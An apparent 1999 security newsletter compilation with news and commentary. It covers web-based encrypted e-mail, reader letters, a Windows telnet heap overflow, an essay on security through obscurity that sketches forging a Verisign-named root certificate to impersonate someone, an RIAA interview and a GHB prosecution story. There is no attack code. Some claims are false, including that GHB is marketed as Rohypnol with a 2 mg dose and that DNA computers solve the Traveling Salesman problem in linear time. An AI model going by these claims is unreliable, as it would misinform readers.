Enigma, but with a 256-element rotor. Methods of attack on such machines are known, but not widely; moreover the amount of work required is likely to be large." Reading the HPUX man page, you get the impression that crypt offers adequate protection for your files. It is a sad statement when cryptographic algorithms that are broken as homework for cryptography students are put forward as a means to protect data by a mainstream OS vendor. ** *** ***** ******* *********** ************* Web-Based Encrypted E-Mail The idea is enticing. Just as you can log onto Hotmail with your browser to send and receive e-mail, there are Web sites you can log on to to send and receive encrypted e-mail. HushMail, ZipLip, YNN-mail, ZixMail. No software to download and install...it just works. But how well? HushMail is basically a PGP or S/MIME-like e-mail application that uses Java (although oddly enough, HushMail is not compatible with either). The sender logs onto the HushMail Web site, and encrypts messages using a Java applet that is automatically downloaded onto his machine. Both the sender and receiver need to have HushMail accounts for this to work. Accounts can be anonymous. The algorithms are 1024-bit ElGamal for key exchange and signatures, and Blowfish for bulk encryption. But everyone's private key is stored on the HushMail server, protected in a passphrase. This means that one weak link is likely to be the passphrase; it's the only protection you have against someone who has legal or illegal access to the HushMail server. (The current beta -- August 99 -- doesn't let you change your passphrase, although they promise the feature in the future.) Another weak link is the Java applet. When you download it, you have no idea if it is the correct applet. Yes, the source code is public, but that doesn't help when you are at a public Internet terminal trying to encrypt or decrypt private e-mail. A Trojaned Java applet can do all sorts of damage, and there is no way to know. Sure, you use an SSL connection between your computer and the HushMail server, but if you don't actually check the details of the received certificate, you have no idea who you are connected to. HushMail is considering writing something to verify the applet automatically, but then how do you trust the verifier? This is actually a major problem. The applet can be signed, but who signed it? Even if you check the certificate, the typical browser permits a dozen different PKI roots by default, and any one of them can issue a forged certificate. This means you have to trust them all. And you have to trust that a Trojan didn't drop a phony certificate into your browser. Note that a downloaded verifier can never solve this problem; it just turns the "how do I trust the applet" question into "how do I trust the verifier." And a third possible weakness is the location of the HushMail servers. Although the company is based in Antigua, the servers are located in Canada. Presumably Canada is more susceptible to legal attacks. And remember that the security depends on the physical protection of the HushMail server. All in all, though, HushMail seems like a reasonable implementation of the idea. The company seems clued; they have a reasonably informative Web site, and respond promptly to security questions. ZipLip is different. Both parties do not need an account to communicate. The sender logs onto the ZipLip Web site and, using SSL, sends a message to someone else. ZipLip then sends the recipient a message telling him that your message is waiting. The recipient then logs onto ZipLip to receive the message. Encryption, outside the two SSL connections, is completely optional. ZipLip won't identify the encryption algorithm used, which is enough to discount them without further analysis. But they do something even stupider; they allow the sender to create an encryption key and then give the recipient a "hint" so that he can guess it. ZipLip's own Web site suggests: "The name of the project we're working on," or "The restaurant where we had dinner last night." Maybe there are 100,000 restaurants, so that's a 17-bit key. The threats here are serious. Both the sender and receiver need to verify their SSL connections, otherwise there is no security. The ZipLip server is a major attack target, both because many messages will not be encrypted, and because those that are will have keys weakened by the requirement that both parties remember them. On the plus side, ZipLip claims a policy of deleting all mail 24 hours after delivery, which provides a level of lawyer-proofing that HushMail does not have...if they implement it properly. YNN-mail is barely worth this paragraph. They encrypt stored messages with a 40-bit key, and don't use SSL when you sign up and send them a long-term password. Snake-oil if I've ever seen it. And I just heard of another, ZixMail . I didn't have time to examine it in depth, but the FAQ -- look at their wishy-washy comments on encryption -- makes it sound like real snake oil, too. Web-based encrypted e-mail is less secure than PGP-encrypted e-mail (or S/MIME e-mail) for a few reasons. One, the constant interaction between the communicants and the server leaves more opportunity for man-in-the-middle attacks, Trojan horses, etc. Two, SSL-based authentication is more vulnerable to spoofing, since almost no one ever bothers to check the details of received certificates and there is no revocation mechanism in place. And three, there are some very attractive attack targets: servers with large collections of secret e-mail and potential decryption keys. Certainly Web-based encrypted e-mail is better than unencrypted e-mail, but I'd stick with PGP or S/MIME if possible. This essay was written with input from Fred Wamsley. A version of this essay appears at: http://www.zdnet.com/zdnn/stories/comment/0,5859,2314064,00.html ** *** ***** ******* *********** ************* Comments from Readers From: "Couvares, Peter F." Subject: Crypto-Hacking For all it's worth, it looks like you were beaten to the punch -- I can find at least four prior uses of "crypto-hacking" or "cryptohacking". Google turned up the following, among others: http://cc2.gamestats.com/wwwboard/messages/894.html http://www.hotwired.com/talk/club/special/transcripts/96-03-13.levy.html All of them seem to use it to mean hacking a system that employs cryptography rather than hacking cryptography itself, however -- your definition is a more useful contribution to the vocabulary. From: John Savard Subject: Cluelessness Alert. I'm not so sure. I certainly do agree that the military can safely allow public information to be stored on Web sites on commercial hosts. However, I have noted that a lot of military sites are actually on U.S. Government-owned machines in the .mil domain. And it is difficult, particularly using common commercially-available operating systems and Internet hosting software, to maintain the kind of impregnable security needed for any system that also contains sensitive information. There are ways of making an Internet server essentially immune to most kinds of hacking. Macintosh servers, not having a CLI, appear to be quite secure. But there are other techniques, most of which require custom software and even custom hardware. For example, to take an idea from the telephone company, how about a computer with two CPUs. CPU number 1 is connected to the hard drive containing the software for the computer, and has read-write access to all of RAM. CPU number 2 is the one connected to the network. It has read-only access to the chunk of memory from which it runs programs. But it has read-write memory for storing data, and read-only access to a hard drive containing the Web site it is to present to the Internet. If it also has data to store, it gets write access to a hard drive for that purpose. The access is determined by *hardwired connections*, not by operating system privileges which can be subverted. In most operating systems, either the Microsoft ones or the Unix clones, networking is part of the operating system, and the TCP/IP connection to the Internet is part of that network. It has to be explicitly limited in its privileges, and if someone gets Administrator privileges/root access, that can be overturned. That shouldn't happen, but any bug in the OS is a possible back door. Now, suppose instead that the OS didn't even HAVE networking in it. The port connected to the Internet was something the OS didn't even know about, and everything that port did was under the control of one unprivileged *applications program*. Even if the OS didn't even have security -- say it was MS-DOS -- with precautions against such attacks as buffer overrun, an applications program with narrowly focussed capabilities could be quite secure. If one doesn't go to these kinds of lengths, though, while it is true that constant vigilance and the use of more conventional security methods (i.e. firewalls) can give "pretty good" security, I think the Pentagon is entirely justified in taking the attitude that the kind of *ironclad* security they need just isn't available if one connects to the Internet. I'm quite sure that the NSA or whoever could come up with a "super-firewall" that could act as a public Web-site host, and yet be updated from within a highly sensitive computer network, with safety. But it would take technologies like the two-CPU sketch above, which just aren't available off the shelf. And it's off-the-shelf technologies that have been used for much of the military's Internet presence. So while it is true there is a way for the military to stay on-line and maintain security, it is also true that that is not immediately available. Taking some Web sites off-line until the vulnerabilities can be remedied isn't a silly policy, even if there may be some individual examples of cluelessness where sites involving no exposure are taken down. From: dragon@revealed.net Subject: Re: Major cluelessness alert I just read your blurb on the Army's consideration of pulling off of the net, and I felt I had to comment. In particular, I disagree with the page which you felt had "a good analysis of this idiotic idea". While I agree that a simple knee-jerk reaction to shut off the Internet connection just because X company did so is not prudent, I do believe that, in an organization with an educated security staff, there is a place for a temporary shut-down of the connection. In particular, I was involved in making this decision for one of the companies I work with, and we were concerned with two points: 1) since Melissa was propagating via e-mail with little human intervention, we decided to cut off access until we had gotten enough control on our internal population to not propagate to our business partners in the way that other large companies had done to us, and 2) to give our admins the breathing room to be able to rationally understand what the impact on our production systems were and to implement the updates/fixes that were coming to us from our suppliers. I don't know how anyone can say that it's idiotic to disconnect from the Internet when in the face of an attack which is both significant in scope and relatively unknown in implementation. Yes, it could be considered to be paranoid, xenophobic, and reactionary, and it's true that it is not necessarily any safer to be connected on any other day, but to deny a security staff the ability to raise the drawbridge until the immediate threat is at least understood hoodwinks us to the point that we won't really be able to function. Finally, I have to say that I agree with at least a part of the military's decision to pull back. The one thing that they mentioned was that they were attempting to correct the positioning of sensitive data. There is a lot of information, military or otherwise, that has no place on the public Internet. The running joke in our department is that the only secure computer is one that is powered off, melted into slag, encased in concrete, and buried at the bottom of the ocean. Your own writings show that not even cryptography is completely reliable due to advances in mathematics and side-channel attacks. There are many, many circumstances where the sensitivity and criticality of data demands location on a network that is air-gap protected from others, whether those other networks are the public Internet, less-secure Intranets, or private WANs connecting to suppliers and dealers. The real idiocy is placing data which needs to be kept secure on machines which are accessible via public, or near-public, channels. From: Jon Williams Subject: Cracking Encrypted ZIP files Regarding encrypted ZIP file cracking: While brute forcing the password may work most of the time for most people and take less time, there is also a known-plaintext attack, which only requires 13 known bytes. Check out http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html for a whitepaper describing the attack and working software. I've successfully used this. From: "David Brownell" Subject: SSL at Wells Fargo Wells Fargo's on-line banking site is still using SSL v2 ... doesn't support browsers configured to use more secure versions (v3, TLS) and has even rejected SSL v2 connections that don't use RC2 (deprecated). I'm sure you understand the SSLv2/RC2 issues, even when 128-bit keys are in use; they're just not as strong as other protocols/ciphers, at least for the front-door sorts of attacks that were NOT your point. The "simple" bungle on their site, however, is that if you've adopted a policy that you're not going to use SSLv2 for "secure" transactions, the Wells Fargo site says to you that your browser isn't secure enough, and you need to get a 128-bit browser. Doesn't say "you must enable an obsolescent version with a dubious cipher" ... which it could say, very easily. It says something completely wrong. That was a useful collection of basic bungles. Don't forget the other type, using an HTTPS page that's got sensitive data in query params for its URL, and an http://... link that'll cause that sensitive data to be logged in what are usually insecure logfiles. (No current examples handy -- but if you see one of those, it's classic!) From: David Crick Subject: SSL at BT British Telecom (BT) are another company with worrying views on Internet security. You'd think with their image and standing that they could do better. Their e-services Web page [www.bthome.com/e_services/index_sh.html] allows home users to check and amend various account details and services. But despite the spread of strong crypto Web-browsers [www.opera.com] and security upgrades for IE, Windows and Netscape [www.replay.com], BT only chose to use 40-bit SSL. This is accompanied by the following endorsement and warning: "When ordering goods and services make sure the Web site you are using uses a 'Secure Socket Layer (SSL)' session. The BT Shop - At Home uses such sessions from the moment you start to place an order." Also: "If you are still uneasy about using the Web to order on-line then you should use an alternative method of ordering." Hardly inspiring, is it? It also makes one dubious about their "Secure Site Programme": "Trustwise Secure Sites use a BT Secure Server certificate to establish proof of identity of the owner of the Web site and enable secure communication between the Web site and visitors to that site. "BT carefully checks the identity of the organization that owns the Web site and verifies that the Web site is registered to that organization. The BT Trustwise Secure Site Programme allows you to learn more about the Web sites you visit before you submit any sensitive or confidential information." Again, I could only find 40-bit SSL in operation, despite the "Trustwise" logo [e.g. see http://www.bt.com/Talk/]. From: Ross Anderson Subject: AES NIST has just announced that the finalists in the Advanced Encryption Standard competition are MARS, RC6, Rijndael, Serpent and Twofish. That makes three U.S. algorithms, one Belgian, and one which I developed in collaboration with colleagues in Israel and Norway. It may be of interest that, under the export controls on intangibles which England's DTI pushed in their recent White Paper and which they are now trying to have adopted as an EU regulation, I would have needed a personal export licence from the DTI in order to do this work. It seems somewhat unlikely that a licence would have been granted. Arms exporters complain to me that DTI officials are notorious for blocking licences to punish them for such 'offences' as complaining about the licensing process. So perhaps I would have not done the work; perhaps I'd have defied the law and now be involved in a huge test case in the European Court; perhaps I'd have emigrated; perhaps we'd just not do research in collaboration with foreigners. Who knows? ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography. Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/ Copyright (c) 1999 by Bruce Schneier ISN is sponsored by Security-Focus.COM @HWA 10.0 TELNET.EXE HEAP OVERFLOW ~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 10:51 pm CET Jeremy Kothe reported to BugTraq about Heap Overflow in windows 98 Telnet.exe. "This version of Telnet (77824 bytes, 11th May 98) has a bug which allows a heap overrun. It assumes that the first command-line argument will be <255 chars when preparing for the "Connect Failed" message-box. The result is that a few crucial bytes can be written over, which, as the telnet app is closing, allow full execution of arbitrary code". Read the details here. Valentin Perelogin also posted that Windows'95 telnet.exe (74,720Kb) is also exploitable. @HWA 11.0 SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 9:30 pm CET This Slashdot feature deals with two views on security, security through obscurity, which relies on the ignorance of attackers rather than the strength of defenders and the opposing full disclosure approach. This paper suggests security through obscurity can and does work in certain strictly limited ways, and should not be eliminated unthinkingly from the admin's arsenal. It further implies that the boundaries between STO and 'real' security are blurry and deserve evaluation. Interesting reading to say the least. Complete story http://slashdot.org/features/99/08/17/1327246.shtml Obscurity as Security Posted by CmdrTaco on Tuesday August 17, @10:00AM EDT from the saaay-wait-a-minute dept. Matthew Priestley has taken a break from slaving for the man to write us a piece where he takes on the convential wisdom that Security through Obscurity isn't secure at all, and tries to argue that sometimes it is. The following was written by Slashdot Reader Matthew Priestley Disclaimer: The author of this paper works for Microsoft, but his opinions may not be those of Microsoft. In fact, they aren't. The author hereby declares that nobody important is even aware of his existence and that the closest he has ever come to plotting with Bill Gates on the Master Plan was when they used adjacent urinals this one time. The author did not peek. 0 Introduction With the popularity of the open-source mindset, a general contempt has drizzled upon all forms of obscurity. The concept of security through obscurity (STO) in particu lar has been decimated. Security through obscurity, which relies on the ignorance of attackers rather than the strength of defenders, is dead in all but practic e. The victory of the opposing full disclosure approach is so complete that proposed ta ctics die at the mere hint they are a form of STO. This paper suggests security through obscurity can and does work in certain strictly limited ways, and should not be eliminated unthinkingly from the admin's arsenal. It further implies that the boundaries between STO and 'real' security are blurry and deserve evaluation. However, this paper in no way proposes obscurity as a method for keeping secrets in the long term. 1 Full disclosure does not apply to instantiated data Instantiated data - the data used by specific instances of an algorithm - do not fall within the scope of full disclosure. Were this not so, then even the simplest password would violate the ban on security through obscurity. Passwords are secrets known only to their creators, and password entry is commonly obscured, as in the case of the 'shadow' login of UNIX. While the login protocol may be open, passwords themselves are a form of STO, with obscurity localized in the password string. Instantiated data are exempt from full disclosure because the risk from their failure is limited. When a script cracks a password, the damage done to the secure system extends only as far as that password's scope. The cracker cannot use the compromised string to gain power directly in another system, even if that system runs the same password protocol. Nor can anything be inferred about the value of one password merely from the value of another with equal or lower permissions. A similar example of instantiated data obscurity is the private key that forms the basis of asymmetric cryptography. So obscure is this information that it is rare for even the owner to be familiar with its precise value. But such obscurity is a necessary element of modern security schemes. Strong security does not eliminate obscurity - rather, it localizes obscurity to instantiated data. The phrase in cryptology, 'carry all security in the key' might be better phrased 'carry all obscurity in the key'. 2 Full disclosure does not apply to time-limited secrets Secrets that expire after a short lifetime can be protected by a wider array of techniques than long-standing secrets. The defense of information that will be irrelevant in a matter of hours or days may not warrant fully peer-reviewed security. Consider the famous Navajo code-talkers of World War II. Among the Americans coordinating the at tack against Japanese-held islands in the Pacific were a number of Navajo Indians, who spoke a slangy version of the complex Navajo tongue. Commands from HQ were issued through these code-talkers, who encrypted and decrypted with an alacrity that belittled the automated methods of the day. This is an excellent example of time-limited security through obscurity. Secret languages are excellent security in the short-term, but however cryptic Navajo may be, it is a code subject to human betrayal. Use of Navajo against the Japanese much beyond the 3-year window of the war would have been unwise. But because the secrets of American strategy in the Pacific were irrelevant after the conclusion of the fighting, the long-term weakness of obscure Navajo as a security measure was unimportant. 3 Obscurity serves as a tripwire Perhaps the classic example of wrongheaded STO is the administrator who modifies his web server to listen on a nonstandard port - thereby confusing attackers, as the theory goes. Considering the degree to which tasks such as port scanning can be automated, the naivete of this defense seems plain. The cracker might be forced to check all 64512 unreserved ports, but eventually the concealed web server will be found. This appears to be a weakness of STO, but if manipulated correctly, it is in fact a great strength. Imagine that our same admin had also invoked a tripwire script and set it to listen on one or more unused ports. When the tripwire is probed with a SYN packet from a cracker trying to locate the web server, instantly the system goes to full alert. The packet is logged and the admin's pager sounds like an alarm. Such tripwire approaches work because they do not expect obscurity to keep information hidden. Rather, they obscure information as a ploy to force invaders into showing their hand. Because the obscured implementation differs on each system, crackers must resort to guess-check scanning before attacks can commence. But tripwires are deployed throughout the system, anticipating this very move. Running an automated kit suddenly becomes a risky proposition, and even talented crackers must gamble on, for example, whether 'root' is really the name of the primary account or merely a hotline to the authorities. Lighthearted implementations of this approach are a staple in the popular "Indiana Jones" films. In one scene, Jones is confronted with a hallway of lettered tiles, all seemingly alike. To cross safely he must step only on those tiles with letters corresponding to the secret word 'Jehovah'. The penalty for a misstep is to crash through the floor and plummet into a gaping pit. Attackers not privy to the password would find an exhaustive search less than optimal in this case. When traps are mingled with genuine data, STO can be a powerful disincentive. Such measures do not make a given machine resistant to breach in the long term, any more than medieval moats could ultimately protect their castles. But like moats, tripwire obscurity provides a critical buffer against attackers, allowing defenders room to breathe. 4 Asymmetric cryptography exhibits traits of STO Despite the notion that asymmetric cryptography such as RSA is 'real' security, in some aspects these methods resemble STO. Indeed, this entire class of cryptography is founded on the hopeful guess that a certain mathematical problem is intractable. The back door into cryptographic methods that rely on multiplying primes is, quite simply, to develop a swift means of factoring those multiples. This NP-time problem must be solved before a private key can b e derived from its corresponding public key, and the notorious difficulty of NP problems leads some supporters to characterize asymmetric cryptography as 'prova bly secure'. This is far from the case - there is uncertainty among mathematicia ns as to whether this problem will even prove non-trivial once approached from t he right angle. Startling progress has been made in solving similar 'impossible' problems using innovative ploys - for example, DNA computers can now solve the Traveling Salesman problem in linear time. Given that asymmetric encryption is used widely in the world's e-commerce infrastructure, the repercussions when this piece of obscurity is cracked are disturbing to contemplate. One telling argument against STO is that it promotes a false sense of security, leading admins into complacency. But the complexity of asymmetric cryptography, combined with reports of its infallibility, can produce much the same effect. Co nsider this social-engineering exploit of digital signing. Using a tool such as m akecert, the cracker generates a root certificate with the name 'Verisign Class 1 Primary CA' and uses it to sign an end-entity certificate with the subject 'CN=Rob Malda, E=malda@slashdot.org' (CT:Please don't. I'm used to posers pretending to be me in Quake, but not on email ;) The cracker then sends the email to an enemy, using a client that does not validate e-mail addresses and spoofing the return address friendly name. The inexpert recipient, thinking all is in order and knowing that digital signatures never lie, trusts the root certificate and hence forth carries on a conversation with a false CmdrTaco. Only scrutiny of the headers will reveal the mail is actually going to a different address. The widely made claim that public-key cryptography is 'real' security and completely unrelated to 'false' STO delivers a more powerful illusion of security than anything an XOR'd password file can provide. Even brute-force cryptanalysis has parallels in STO. Suppose we wish to conceal the passwords for a number of Swedish bank accounts. We resolve to write them to a secret location on our hard drive, perhaps a few unused bytes in a file sector. Only we, who know the lucky offset, can read the data. This form of concealment is a typical case of secruity through obscurity. The integrity of our secret depends on the ignorance of the cracker, and a trial of all 2^n possible locatio ns compromises the system. But in what way is this fundamentally different from the 'genuine' security of n-bit encryption? To break this form of security, 2^n keys are generated and tried agains t the cipher text until the result is a plain body. Is the difference between this 'true' security and the 'false' STO merely than n is considerably larger in encryption than in the case of hard drives? But this implies that our real error lay, not in reliance upon obscurity, but in having a hard drive of insufficient size! 5 Conclusions Security in the absence of obscurity is not strictly possible, but good systems both localize and advertise their points of obscurity. When the admin is fully a ware of the obscurity in a system, tripwires and instantiated data can provide a useful complement to more rigorous security techniques. Obscurity cannot keep information safe or concealed for long, but it can make attacks risky and destroy the effectiveness of automatic kits. These benefits should not be dismissed as an article of faith. @HWA 12.0 THE MUSIC INDUSTRIES' "CYBER-SHERRIF" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 9:00 pm CET The growing number illegal MP3 copies of copyrighted songs that are distributed across the Net is becoming an increasingly big problem for the music industry. Here's an interview with RIAA Executive Director Hilary Rosen on this matter. Read the interview below http://www.businessweek.com/bwdaily/dnflash/aug1999/nf90817b.htm Music and the Net: A Chat with the Industry's Cyber Sheriff RIAA Executive Director Hilary Rosen sings a tune you might not expect "When the music's over, turn out the lights" crooned the Doors' Jim Morrison some 30 years ago. Today, the dirge is a fitting take on how Net pioneers regard the lumbering record industry, which they almost giddily hope will be toppled by the Web's ability to sort and transmit digital music for sale online. In recent months, the industry's vulnerability has been underscored by the stunning growth of MP3 files -- many of which are record companies' own copyrighted songs uploaded sub rosa onto illegal trading posts. The record companies have a sheriff, of course. She's Hilary Rosen, long-time executive director of the 47-year-old Recording Industry Association of America. While the industry undergoes painful, and sometimes enlightening change, it's Rosen's responsibility to keep order. The hastily formed Secure Digital Music Initiative, for instance, is an effort by the major record and technology companies to stop illegal duplication of copyrighted material. Beyond this squabbling over standards, Rosen must also help record companies confront a larger question: Will they even matter 20 years from now? Looking for answers, Business Week staff editor Dennis Berman chatted with Rosen recently. Here's an edited transcript of their conversation: Q: How would you describe the state of mind of a big chunk of your consumers, namely young people who are growing up on the Internet, where so many of the products and services are free? A: I don't think the concept of music being free is new. I think the shift is how consumer expectations of getting products through the Internet has built up as a free activity. But I actually don't think it's as big a problem as some people might expect me to think. We know consumers want music. And we know they want it online, and I'm grateful to the MP3 phenomenon for showing the music community just how badly [consumers] do want it. They're willing to spend all that time and energy to download in the most difficult, complex, time-consuming, incompatible ways. I mean, have you downloaded MP3 files? It's a pain. It's not really easy. It's hard to choose the thing, you don't really get the sample. It's not easy. So if they're willing to go through that much trouble to get music, I'm completely convinced that if an artist offers them a fresh version of the highest sound quality with the lyrics packaged, then consumers want to pay for that. It will be easy, it will be compatible. Q: What business lessons do you think record companies -- habitually criticized as being slow and lumbering and profiteering -- have learned from the Internet? A: I think No. 1 would be that record companies were traditionally forced into the box of seeing the retailer as their customer, because the retailers bought the records and then sold them to the consumer. Whereas, the Internet has given both the record companies and the artists a direct relationship with their fans. That's probably the most significant thing. We have a small member company label called Astralwerks. It's a great label, great energy. Their relationship with the Chemical Brothers [a techno group] is so intense that they now have their marketing plan for the new Chemical Brothers release suggested to them by the fans whom they have Web relationships with. Gimmick, yes, but extraordinarily appealing. [Now] people communicate with you about real research, not just a bunch of guys in gray suits telling you what they perceive their phone bankers have learned -- but real research. So, I think that's No. 1 -- that it is fundamentally changing the relationships that exist between the music consumer and the providers of the music. I think one other thing, and that is the sort of value equation about music use. It used to be that there was one business model, they sold records. So, all of their investment and marketing or promotion and tour support, and whatever they did with an artist, had to be made up in a record sale. With the Web, you have the opportunity for a real variety of business models, driven by the consumer. That means you don't have to make a million dollars selling the whole album. If you make $100,000 here selling the album, and $100,000 dollars in licensing fees for a track on an online jukebox, and then another $100,000 doing your licensing for a Webcast, then the multiple revenue streams really allow you to take a lot more risks -- on music that might not otherwise be as profitable, and that you wouldn't, therefore, take the risk on. Q: What do you worry most about? A: I think it's interesting how labels can sustain major artists' increasing desires -- and deserved desires -- for more and more money, with limited capitalization in some of the more entrenched companies. And I guess it's sort of how do you get the infusion of cash that you need, and then, what do you do with that cash? Q: How do you feel about losing the suit against Diamond Multimedia [the first company to develop a mobile player for MP3 files. The RIAA sued Diamond, claiming that its technology allowed for illegal use of copyrighted material.] A: Somebody asked me if we'd bring the Diamond suit again. As recently as 18 months ago when this suit was brought, the whole world was different. Q: How was it different? A: The technology industry didn't come to the table with any level of understanding for the creative community -- that the products were being considered as ways to exploit the music, not expand it. At the time, it was the best judgment call that was made, that we could make. Q: So, you regret it now? A: No. What I regret is that it sends a signal about our attitude, which I think is incorrect. It was never the strategy, it was just a part of the strategy. Concepts like SDMI and bringing people together has always been the strategy. And the RIAA, unfortunately, jumped out of the box there. Q: One thing that seems to be missing is artists' involvement. Artists saying, "Hey, you know, we put out this music that means so much in your life, we deserve to be paid for it. We certainly don't deserve to be ripped off." Why don't we see more artists making those statements? A: I think artists don't like to be perceived as getting into controversy -- they're about their music, they're about their relationships with their fans. I think that given the way that this was positioned in the press over the last two years -- artists vs. fans, artists vs. record companies -- anytime somebody said something, they were taking sides. I think that has been tough. But I will tell you, I get calls from artists and managers every day asking us to take stuff off a Web site. If artists were every day telling me, "You know, we don't believe in what you're doing, we think this should all be free. We don't care about our stuff being protected," I'd go find another job. They don't, as a rule, feel that way. As a rule, they pretty much feel like they should get compensated. Artists, a lot of artists, deserve to be, need to be, want to be seen as technology-friendly. And I think if we can provide a safe space for them to be able to do that and still protect their interests, that's O.K.. Q: If you had to draw a pie chart of how you spend your time, I guess the Internet is taking a bigger piece of the pie. How has that changed over the last two years? A: I would say that four years ago, it was 10%, and now it's 90%. It's a lot. Although I've had a heavy six months on violence in music, too. Music has always represented some social rebellion, and the Internet has become a socially rebellious child, in essence, for a lot of mainstream business and parents. For everybody else who is used to a certain way of life, the Internet is just banging on their door, just like that nasty rock and roll that you wish would leave your daughter alone. Q: So over time, the Internet may put more power into independent labels? In the next couple of years, the independents may take more of the pie? A: I actually don't think that the pie stays the same size. I think the pie expands. Q: How long does it take record companies to realize that? A: Maybe it took a minute longer than it took every other smart person in the world, but they're there. The majors take a lot of knocks for being slow to come to this thing. And, you know, some of it deservedly so. But I think that also a business reporter would understand this because, they're sitting on billions of dollars of assets on behalf of artists and their companies. [Nearly] 99% of their sales are still in bricks and mortar retail. That's a huge responsibility, [and explains] the concept that they were a little more thoughtful about how to go forward in this space than a kid changing the world, sitting in his mom's bedroom with his own computer. @HWA 13.0 ReDaTtAcK CHARGED ANYWAYS ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 8:35 pm CET ISP Belgacom Skynet, which was compromised by the hacker ReDaTtAcK last week, has after an initial statement that they wouldn't press charges decided to do a 180 and charge him anyways. This is after the hacker sent the ISP a fax himself to inform them about the holes in their systems. @HWA 14.0 NA/MCAFEE RELEASES NEW VIRUS SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 3:05 am CET Network Associates will this week unveil its ActiveShield service, which will deliver anti-virus software updates to users' computers whenever they are connected to the Internet. In this way users will receive fixes as soon as they are made availble. Read more -------------------------------------------------------------- This story was printed from Inter@ctive Week, located at http://www.zdnet.com/intweek. -------------------------------------------------------------- McAfee Launches New Virus Service By Mel Duvall, Inter@ctive Week August 16, 1999 1:15 PM PT URL: http://www.zdnet.com/intweek/stories/news/0,4164,2315320,00.html Network Associates will unveil technology this week that it said will revolutionize the process of keeping computers updated with the latest anti-virus software. The security firm's McAfee division will launch its ActiveShield service through its McAfee.com Web site, which will deliver anti-virus software updates to users' computers whenever they are connected to the Internet. Anthony Kim, manager of McAfee Clinic, said the software has the potential to limit the damage caused by such outbreaks as the Melissa virus, because users will receive fixes as soon as they are available. The ActiveShield software pings the McAfee server daily to check for software updates, patches or fixes. It gives the user the option of downloading and installing the fix, or doing it at a later date. McAfee will price ActiveShield at $39.95 for a yearly subscription. But, for a limited time, it will be $19.95. @HWA 15.0 TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 2:50 am CET Two man have been charged by the Michigan attorney general in connection with allegedly promoting the sale and at-home manufacture of the "date-rape" drug. Attorney General Jennifer M. Granholm, D, also said the two men have been filed with notice to stop within 10 days the sale of the so-called "kits" to make the drug, or face additional criminal charges and penalties of up to 90 days in jail, a $5,000 fine, or both. For now they have been charged with one count of solicitation to manufacture a controlled substance and face a maximum of 30 years in jail if convicted. Newsbytes Two Charged With Promoting Date-Rape Drug Via The Net http://www.newsbytes.com/pubNews/99/134907.html By Bob Woods, Newsbytes LANSING, MICHIGAN, U.S.A., 16 Aug 1999, 3:21 PM CST Two men who live outside Michigan have been charged by that state's attorney general in connection with allegedly promoting the sale and at-home manufacture of the controversial drug gamma- hydroxybutyrate (GHB), better known as the "date-rape drug." Attorney General Jennifer M. Granholm, D, also said the two men have been filed with notice to stop within 10 days the sale of the so-called "kits" to make the drug, or face additional criminal charges and penalties of up to 90 days in jail, a $5,000 fine, or both. The action marks the first time a criminal prosecution has been initiated as a result of selling GHB over the Internet, attorney general spokesperson Chris DeWitt told Newsbytes today. Both Carl Gorton, 63, of Merritt Island, Fla., and John Hedrick, 22, of Colorado Springs, Co., are now were charged with one count of solicitation to manufacture a controlled substance. Charges were filed in 36th Judicial District Court in Detroit. Gorton and Hedrick now face felony charges and a maximum penalty of 30 years in jail, if convicted. Gorton was at large as of this afternoon, while Hedrick had been arrested and is now out on bond, DeWitt said. GHB, which is marketed as Rohypnol, is also known as roofies, liquid ecstasy, liquid X and organic Quaalude, among other names. A 2-milligram (mg) dose of GHB can result in unconsciousness within 20 minutes of ingestion, usually through a drink laced with the drug. The next morning, the person who took the drug has no memory of the previous evening's events. Gorton and Hedrick "knowingly and intentionally" solicited undercover agents from the attorney general office's new High Tech Crime Unit to make GMB through the sale of a "do-it-yourself" GHB ingredient kit, authorities say. A Website owned by Gorton allegedly advocated and encouraged the use of GHB, and stated that the company can offer "legally available GHB" because it has "concluded that the chemical components could be sold as a kit and combined by customers at home without special equipment, all of which is safe and perfectly legal," Granholm's office also said. "Selling a dangerous, controlled substance on the Internet doesn't make it safe, and it certainly doesn't make it legal," Granholm said in a statement. The alleged action occurred via the Website sponsored by "Centurian Aging Research Laboratory" (CARL). The CARL Website included an order form that directed customers to send cash or money orders to a post office box registered to Hedrick, the attorney general's office also said. The Website is no longer active, DeWitt said. GHB, under Michigan law, is a Schedule 1 controlled substance, which makes it illegal to use, manufacture or possess the drug in the Wolverine State. Soliciting or inducing the manufacture of such controlled substances is also illegal. DeWitt said the attorney general was within the scope of her office to go after the two suspects. "It would be no different if someone called a person in Indiana to buy heroin, and it was then shipped (to Michigan)," he said. Granholm's High Tech Crime Unit is made up of three assistant attorneys general, one investigator, and support staff, DeWitt said. The team, which is a part of the attorney general office's criminal division, deals 